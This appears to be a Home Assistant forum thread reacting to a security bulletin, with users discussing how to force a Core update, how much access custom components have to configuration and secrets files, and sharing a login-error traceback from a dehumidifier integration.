Security Bulletin

Hass.io” is not a term we use anymore. It was ambiguous by itself as well.

This is a new release of the Home Assistant Core application, which runs on all, no matter which installation method you use.

3 Likes

My Supervisor menu isn’t showing any available updates. Is there a way to force the check? I already followed directions to click the Reload on the System tab to no avail.

can use ssh addon.

ha core update --version  2021.1.2

It should be available though… I got a notification a few hours ago

1 Like

I don’t know what it is about my setup, but at times I don’t get notifications for a week or two. The only way I can reliably force the notification to appear is to reboot the host, which is a rather heavy-handed for my liking.

While “disable all your custom components” is prudent until the risk is analysed, “all custom components run at your own risk” does not work for me as a security posture.

Moving forward can we please get some clarity from the developers over exactly what reach into the home assistant environment, config files etc a custom component (not an add on) has and where it’s restricted?

Thank you

3 Likes

Are you saying you think a custom component shouldn’t be able to read configuration.yaml?

If so, how would you configure a custom component?

If you meant something else, my apologies.

3 Likes

Do you think it might be an idea to put the pitchforks down and wait for more information which is surely forthcoming?

27 Likes

This should also be posted on https://alerts.home-assistant.io/

Is this why Alexa sensors {timer, alarm, ect} are no longer available?

Doesn’t this functionality already exist? Add-ons for one have separate config files. Integrations can be configured in a separate yaml file. Name the file integration_name.yaml then add

integration_name: !include integration_name.yaml

in config.yaml.

Or am I miss understanding the use of setting up individual configs this way? I just assumed this would limit an integration to only it’s own config file.

For organization not security

Files can be separated to make more human readable and allow config separate in manner logical to user.

Nothing to do with security

secrets.yaml was for security. Remove passwords from config. Not sure how access to this is managed for integration

2 Likes

secrets.yaml is just a txt file to store your passwords etc so that you could exclude the file from being uploaded to git or shared. There isn’t any security on this file i believe

Storing secrets - Home Assistant (home-assistant.io)

4 Likes

Lucky you, it’s cold here (US) in most of the states. :slight_smile: Enjoy your weather!

I thought you may have been in Aus too with the Kangaroo name.

3 Likes

Is there “a list” of components already available?

After update I get below. Doet that mean that custom component was leaking?

Logger: homeassistant.setup
Source: custom_components/midea_dehumidifier/__init__.py:66
First occurred: 8:47:00 AM (1 occurrences)
Last logged: 8:47:00 AM
Error during setup of component midea_dehumidifier

Traceback (most recent call last):
  File "/usr/src/homeassistant/homeassistant/setup.py", line 213, in _async_setup_component
    result = await task
  File "/config/custom_components/midea_dehumidifier/__init__.py", line 66, in async_setup
    res = await hass.async_add_executor_job(client.login)
  File "/usr/local/lib/python3.8/concurrent/futures/thread.py", line 57, in run
    result = self.fn(*self.args, **self.kwargs)
  File "/usr/local/lib/python3.8/site-packages/midea_inventor_lib/midea_client.py", line 69, in login
    response = self.__api_request("/v1/user/login/id/get", {"loginAccount": self.email})
  File "/usr/local/lib/python3.8/site-packages/midea_inventor_lib/midea_client.py", line 585, in __api_request
    response = self.__send_api_request(path, args)
  File "/usr/local/lib/python3.8/site-packages/midea_inventor_lib/midea_client.py", line 596, in __send_api_request
    data = response.json()
  File "/usr/local/lib/python3.8/site-packages/requests/models.py", line 900, in json
    return complexjson.loads(self.text, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/simplejson/__init__.py", line 525, in loads
    return _default_decoder.decode(s)
  File "/usr/local/lib/python3.8/site-packages/simplejson/decoder.py", line 370, in decode
    obj, end = self.raw_decode(s)
  File "/usr/local/lib/python3.8/site-packages/simplejson/decoder.py", line 400, in raw_decode
    return self.scan_once(s, idx=_w(s, idx).end())
simplejson.errors.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

And now we wait for more information. I get that @balloob is attempting to get in front of this issue with the update guidance but for many long term users, blindly updating isn’t feasible.

1 Like

Yet another reason to not fall too far behind and now get forced to update 10+ versions…

11 Likes

These are custom components running within your very instance of HA. Demanding “assumed” safe guards from unknown third party code is akin to demanding car manufacturers guarantee the passenger of your car not be able to grab the steering wheel. Except in this case you just let people in the passenger seat cause they look cool. custom components run inside of HA. It is safe to assume, like your passenger, they have access to everything.

To be blunt, I think its rather rude to expect the core developers to vet every line of code of every custom component for safety free of charge. Do you know how much code is that?

10 Likes

And the alternative, banning custom components, would be a disaster.

7 Likes

Just like I wouldn’t blame Microsoft when I install a suspicious software and it has a Trojan or virus in it.

3 Likes